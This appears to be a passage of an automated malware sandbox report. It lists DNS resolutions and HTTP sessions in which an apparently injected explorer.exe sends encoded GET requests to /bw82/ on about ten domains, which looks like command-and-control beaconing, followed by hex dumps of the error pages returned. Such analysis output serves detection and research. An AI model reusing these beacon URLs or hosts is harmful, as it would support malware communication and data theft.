                                                                        Feb 23, 2021 09:00:38.631567001 CET8.8.8.8192.168.2.30x8c97No error (0)ramjamdee.com34.102.136.180A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 09:00:43.921757936 CET8.8.8.8192.168.2.30x23e2No error (0)www.rizrvd.comrizrvd.comCNAME (Canonical name)IN (0x0001)
                                                                        Feb 23, 2021 09:00:43.921757936 CET8.8.8.8192.168.2.30x23e2No error (0)rizrvd.com34.102.136.180A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 09:00:49.198060989 CET8.8.8.8192.168.2.30xaf8dNo error (0)www.gdsjgf.comgdsjgf.comCNAME (Canonical name)IN (0x0001)
                                                                        Feb 23, 2021 09:00:49.198060989 CET8.8.8.8192.168.2.30xaf8dNo error (0)gdsjgf.com34.102.136.180A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 09:00:54.460644007 CET8.8.8.8192.168.2.30xb35aNo error (0)www.climaxnovels.comclimaxnovels.comCNAME (Canonical name)IN (0x0001)
                                                                        Feb 23, 2021 09:00:54.460644007 CET8.8.8.8192.168.2.30xb35aNo error (0)climaxnovels.com34.102.136.180A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 09:00:59.902288914 CET8.8.8.8192.168.2.30xb202No error (0)www.thebabyfriendly.com154.80.226.18A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 09:01:05.689476967 CET8.8.8.8192.168.2.30xce86Name error (3)www.chrisbubser.digitalnonenoneA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 09:01:10.869110107 CET8.8.8.8192.168.2.30x2d31No error (0)www.wellnesssensation.com52.128.23.153A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 09:01:16.085098028 CET8.8.8.8192.168.2.30x886bNo error (0)www.gallerybrows.comgallerybrows.comCNAME (Canonical name)IN (0x0001)
                                                                        Feb 23, 2021 09:01:16.085098028 CET8.8.8.8192.168.2.30x886bNo error (0)gallerybrows.com34.102.136.180A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 09:01:21.344999075 CET8.8.8.8192.168.2.30x3500No error (0)www.yjpps.com0.0.0.0A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 09:01:27.056251049 CET8.8.8.8192.168.2.30x13f5No error (0)www.usmedicarenow.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                                        Feb 23, 2021 09:01:27.056251049 CET8.8.8.8192.168.2.30x13f5No error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 09:01:27.056251049 CET8.8.8.8192.168.2.30x13f5No error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 09:01:27.056251049 CET8.8.8.8192.168.2.30x13f5No error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 09:01:27.056251049 CET8.8.8.8192.168.2.30x13f5No error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 09:01:32.493457079 CET8.8.8.8192.168.2.30x2ed9No error (0)www.activagebenefits.netactivagebenefits.netCNAME (Canonical name)IN (0x0001)
                                                                        Feb 23, 2021 09:01:32.493457079 CET8.8.8.8192.168.2.30x2ed9No error (0)activagebenefits.net34.102.136.180A (IP address)IN (0x0001)

                                                                        HTTP Request Dependency Graph

                                                                        • www.h2oturkiye.com
                                                                        • www.ramjamdee.com
                                                                        • www.rizrvd.com
                                                                        • www.gdsjgf.com
                                                                        • www.climaxnovels.com
                                                                        • www.thebabyfriendly.com
                                                                        • www.wellnesssensation.com
                                                                        • www.gallerybrows.com
                                                                        • www.usmedicarenow.com
                                                                        • www.activagebenefits.net

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        0192.168.2.34972494.73.146.4280C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Feb 23, 2021 09:00:33.481127977 CET1237OUTGET /bw82/?2dspCJ=CMr/hCS473yTOMLQRlwKDrCPfcrQCABATOinOmsXstIRfABY7iJyJix7IPLOuntXuF5p&L6Ah=2dPLKjuxNzghip HTTP/1.1
                                                                        Host: www.h2oturkiye.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 09:00:33.554917097 CET1238INHTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                        Pragma: no-cache
                                                                        Content-Type: text/html
                                                                        Content-Length: 1237
                                                                        Date: Tue, 23 Feb 2021 08:00:33 GMT
                                                                        Server: LiteSpeed
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" ><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised tha


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        1192.168.2.34973134.102.136.18080C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Feb 23, 2021 09:00:38.674968004 CET1550OUTGET /bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=G5V/jI1lXUWhm2/po/i12Eg93VLS1Yw8/s5fANqQYS1eyL2v/ZzyMw3Ygf/31m6ddEJO HTTP/1.1
                                                                        Host: www.ramjamdee.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 09:00:38.814054966 CET1554INHTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Tue, 23 Feb 2021 08:00:38 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "603155b8-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        2192.168.2.34973734.102.136.18080C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Feb 23, 2021 09:00:43.964195013 CET2168OUTGET /bw82/?2dspCJ=AJ+QNFfpTCGoeNdN3oQHABBFVni950JEMBWacmvnp29IOaric6KDWsJikAvcMmAxBpMV&L6Ah=2dPLKjuxNzghip HTTP/1.1
                                                                        Host: www.rizrvd.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 09:00:44.103739977 CET2168INHTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Tue, 23 Feb 2021 08:00:44 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "603155b8-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        3192.168.2.34973834.102.136.18080C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Feb 23, 2021 09:00:49.240714073 CET2172OUTGET /bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=7KG5rMnJQVi61jAewyvwq06b8xrmRTVdiDIOhf904IMqwa5VOrK6tjTZXar9S1Zs43DY HTTP/1.1
                                                                        Host: www.gdsjgf.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 09:00:49.379719019 CET2173INHTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Tue, 23 Feb 2021 08:00:49 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "603153c4-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        4192.168.2.34974434.102.136.18080C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Feb 23, 2021 09:00:54.503062010 CET6106OUTGET /bw82/?2dspCJ=ErYhPq0/zQvehGK9wS6+i9BP1HsxrMLlWLaBPkVFk6gJ3Rf5IPX3ZCPP9+b6hANSOkIk&L6Ah=2dPLKjuxNzghip HTTP/1.1
                                                                        Host: www.climaxnovels.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 09:00:54.643258095 CET6107INHTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Tue, 23 Feb 2021 08:00:54 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "603155b9-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        5192.168.2.349745154.80.226.1880C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Feb 23, 2021 09:01:00.252922058 CET6109OUTGET /bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=r3fdhBxfm/17hO+WGttpxejAYTJXJLNaeaIMUW/kEa9Q3oKyIBTjSr0cbQanu0dSY6cl HTTP/1.1
                                                                        Host: www.thebabyfriendly.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 09:01:00.606403112 CET6109INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Tue, 23 Feb 2021 08:01:00 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 1.0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        6192.168.2.34974652.128.23.15380C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Feb 23, 2021 09:01:10.922751904 CET6110OUTGET /bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj HTTP/1.1
                                                                        Host: www.wellnesssensation.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 09:01:10.973952055 CET6111INHTTP/1.1 463
                                                                        Server: nginx
                                                                        Date: Tue, 23 Feb 2021 08:01:10 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 8915
                                                                        Connection: close
                                                                        ETag: "5e52d3c2-22d3"
                                                                        X-DIS-Request-ID: 8829058ea78309a76b89162ecd6786d9
                                                                        Set-Cookie: dis-remote-addr=84.17.52.38
                                                                        Set-Cookie: dis-timestamp=2021-02-23T00:01:10-08:00
                                                                        Set-Cookie: dis-request-id=8829058ea78309a76b89162ecd6786d9
                                                                        X-Frame-Options: sameorigin


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        7192.168.2.34974734.102.136.18080C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Feb 23, 2021 09:01:16.127204895 CET6121OUTGET /bw82/?2dspCJ=qtQC6ueLh9SPHvPoeB2W7XMv4DHg8NEty8uJPphl3NdNxxbo+oCUuV5k45UTpNkEWHc7&L6Ah=2dPLKjuxNzghip HTTP/1.1
                                                                        Host: www.gallerybrows.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 09:01:16.266371012 CET6121INHTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Tue, 23 Feb 2021 08:01:16 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "6031584e-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        8192.168.2.349750198.185.159.14480C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Feb 23, 2021 09:01:27.236773014 CET6141OUTGET /bw82/?2dspCJ=cQgJWKf8RQ1tgXmhpNlNvU1Wcwt7yBWYkRci+XoIvJPaxwQIB73a/eHibjyZxTY12AhF&L6Ah=2dPLKjuxNzghip HTTP/1.1
                                                                        Host: www.usmedicarenow.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 09:01:27.410075903 CET6142INHTTP/1.1 400 Bad Request
                                                                        Cache-Control: no-cache, must-revalidate
                                                                        Content-Length: 77564
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Date: Tue, 23 Feb 2021 08:01:27 UTC
                                                                        Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                        Pragma: no-cache
                                                                        Server: Squarespace
                                                                        X-Contextid: lqHZDjYv/YoSYJ3JA
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 